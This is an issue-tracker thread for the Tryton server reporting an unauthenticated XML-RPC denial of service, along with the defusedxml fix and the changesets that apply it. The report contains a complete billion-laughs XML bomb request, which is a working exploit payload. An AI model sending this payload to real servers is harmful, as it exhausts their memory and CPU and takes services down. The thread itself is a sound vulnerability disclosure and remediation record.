Created on 2022-02-11.13:03:34 by jeremy.mousset, last changed 5 months ago by roundup-bot.
New changeset 69e8f18f5682 by Cédric Krier in branch 'default': Protect against XML vulnerabilities https://hg.tryton.org/tryton-env/rev/69e8f18f5682
New changeset a64ca55b86e3 by Cédric Krier in branch 'default': Protect against XML vulnerabilities https://hg.tryton.org/trytond/rev/a64ca55b86e3 New changeset 2ef295408a0b by Cédric Krier in branch '6.2': Protect against XML vulnerabilities https://hg.tryton.org/trytond/rev/2ef295408a0b New changeset b8e700d01652 by Cédric Krier in branch '6.0': Protect against XML vulnerabilities https://hg.tryton.org/trytond/rev/b8e700d01652 New changeset d0744bba5682 by Cédric Krier in branch '5.0': Protect against XML vulnerabilities https://hg.tryton.org/trytond/rev/d0744bba5682
New changeset f801a89c84e7 by Cédric Krier in branch 'default': Protect against XML vulnerabilities https://hg.tryton.org/proteus/rev/f801a89c84e7 New changeset e4019b6ca238 by Cédric Krier in branch '6.2': Protect against XML vulnerabilities https://hg.tryton.org/proteus/rev/e4019b6ca238 New changeset 973635df5e61 by Cédric Krier in branch '6.0': Protect against XML vulnerabilities https://hg.tryton.org/proteus/rev/973635df5e61 New changeset 85eb95f609cf by Cédric Krier in branch '5.0': Protect against XML vulnerabilities https://hg.tryton.org/proteus/rev/85eb95f609cf
I propose the March 1st to make the security release (with exiting bugfix) and the March 2nd to make the announce.
I have pyexpat.EXPAT_VERSION : 'expat_2.2.8'
Indeed the debian version with which we build tryton docker images, does not still have fixed expat. So it still makes sense to apply defusedxml in trytond
and proteus
.
I do not think we need to do it for tryton
because the Windows and MacOS builds are used fixed expat libraries and also we parse only XML from user or the server (which are controlled).
Indeed normally stdlib should not be vulnerable to billion laughs if used with expat >= 2.4.1. Which version (pyexpat.EXPAT_VERSION) have you?
For me it is similar to issue11219 and should be fixed together.
Indeed we should apply the monkey patch on trytond which uses xmlrpc.client to parse XML-RPC request and on proteus which can be used as xmlrpc client.
Tested against trytond 6.2 with Python 3.8.10
A non authenticated user can saturate the trytond server's memory and CPU usage with a single xmlrpc request , using the billion laughs attack or other similar "xml bomb" attacks.
Request example [ do not test it against a production server of course :) ] :
url : http//example.trytond.com/
method: POST
headers:
Content-Type: text/xml
body:
<?xml version='1.0'?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<methodCall>
<methodName>&lol9;</methodName>
<params>
</params>
</methodCall>
When the trytond server receives the request, its RAM usage quickly skyrockets, and the CPU also becomes very busy.
When testing the request on my machine, the 16GB of RAM and 1 GB swap were full in under a minute.
defusedxml has a monkey patch for this.
If we use this monkey patch by adding the following to to trytond/protocols/xmlrpc.py:
from defusedxml.xmlrpc import monkey_patch
monkey_patch()
then the server will respond to the same request with :
"400 Bad Request: Unable to read XMl request".
(because the monkey patch forbids it)
So, it does looks like a simple protection against this attack and similar "xml bomb" attacks.
History | |||
---|---|---|---|
Date | User | Action | Args |
2022-03-01 19:58:29 | roundup-bot | set | messages: + msg74388 |
2022-03-01 19:57:57 | roundup-bot | set | messages: + msg74386 |
2022-03-01 19:57:13 | roundup-bot | set | messages:
+ msg74384 status: testing -> resolved |
2022-02-22 22:54:49 | ced | set | messages: + msg74306 |
2022-02-14 10:38:45 | jeremy.mousset | set | messages: + msg74099 |
2022-02-12 17:30:29 | ced | set | messages: + msg74062 |
2022-02-12 15:14:42 | ced | set | messages: + msg74055 |
2022-02-11 13:29:15 | ced | set | assignedto: ced component: + trytond, proteus keyword: + review messages: + msg74017 reviews: 381941002 status: unread -> testing |
2022-02-11 13:12:55 | jeremy.mousset | set | title: A non authenticated use can cause a denial of service with a single request using an xml bomb attack on xmlrpc -> A non authenticated user can cause a denial of service with a single request using an xml bomb attack on xmlrpc |
2022-02-11 13:03:34 | jeremy.mousset | create |
Showing 10 items. Show all history (warning: this could be VERY long)